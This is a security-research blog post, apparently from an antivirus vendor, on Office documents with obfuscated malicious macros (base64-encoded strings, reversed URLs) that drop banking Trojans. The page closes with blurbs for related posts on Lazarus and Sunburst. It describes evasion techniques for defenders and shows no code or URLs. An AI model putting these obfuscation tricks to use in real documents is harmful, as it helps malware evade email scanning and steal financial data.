Obfuscated malicious office documents adopted by cybercriminals around the world

After going out of fashion for a number of years, malicious macros inside Office files have recently experienced a revival. And why not, especially if they are a lot cheaper than exploits and capable of doing the same job?

Yes, that’s right, cybercriminals are busily recycling this old technique, introducing new obfuscation forms to make it more effective. Let’s look at two examples.

Sample 1

This is an excel file with malicious embedded macros. However if you use standard Office tools to look at the macros, depending on the version, you will not see anything malicious at all or you won’t be allowed to see the macros itself:

That is because the sample all strings in macros are obfuscated with a base64 encoding technique.

After de-obfuscation you can see clearly the URLs used to download the payloads:

This is a very simple technique but it is effective against simple heuristics that use string analysis of all incoming email attachments, and this is reflected in a very low VT detection

This particular sample is also interesting since in some Excel versions it is able to run macros automatically without prompting the user, enabling it. Once it has run, it drops a password-stealing Trojan directly onto the victim’s system.

Sample 2

This another example is a fake Aeromexico ticket.

There is no obfuscation but the URL is written from right to left, which again it might be quite useful against simple GREP analysis techniques:

It is interesting to note that the first sample was found in the wild in Venezuela, the second in Mexico and then the third in Brazil:

This one drops a ChePro banker. All three malicious samples drop only Trojans that steal financial data, but the same technique can be easily used to drop any type of malware.

So does it mean that only Latin American cybercriminals use this technique? The answer is no, not really. Our relative user’s infections statistics show that actually the countries with the most attempted infections using this kind of malware are Germany and then Poland.

However, the technique is seen elsewhere, including Spain, Mexico, Brazil and others.

While analyzing malicious macro office files, you can see that the original document is created by one user and then somebody else (another criminal) assists in embedding the malicious macros.

The same technique can be easily used to drop any kind of malware in any country since this is all about social engineering and it will easily pass through email gateway security because it is basically an office document, and security email policies allow those.

You may follow me on twitter: @dimitribest

Obfuscated malicious office documents adopted by cybercriminals around the world

Your email address will not be published. Required fields are marked *



Lazarus targets defense industry with ThreatNeedle

In mid-2020, we realized that Lazarus was launching attacks on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of Manuscrypt (a.k.a. NukeSped). While investigating this activity, we were able to observe the complete life cycle of an attack, uncovering more technical details and links to the group’s other campaigns.

Sunburst backdoor – code overlaps with Kazuar

While looking at the Sunburst backdoor, we discovered several features that overlap with a previously identified backdoor known as Kazuar. Our observations shows that Kazuar was used together with Turla tools during multiple breaches in past years.

Lazarus covets COVID-19-related intelligence

As the COVID-19 crisis grinds on, some threat actors are trying to speed up vaccine development by any means available. We have found evidence that the Lazarus group is going after intelligence that could help these efforts by attacking entities related to COVID-19 research.

Sunburst: connecting the dots in the DNS requests

We matched private and public DNS data for the SUNBURST-malware root C2 domain with the CNAME records, to identify who was targeted for further exploitation. In total, we analyzed 1722 DNS records, leading to 1026 unique target name parts and 964 unique UIDs.

Subscribe to our weekly e-mails

The hottest research right in your inbox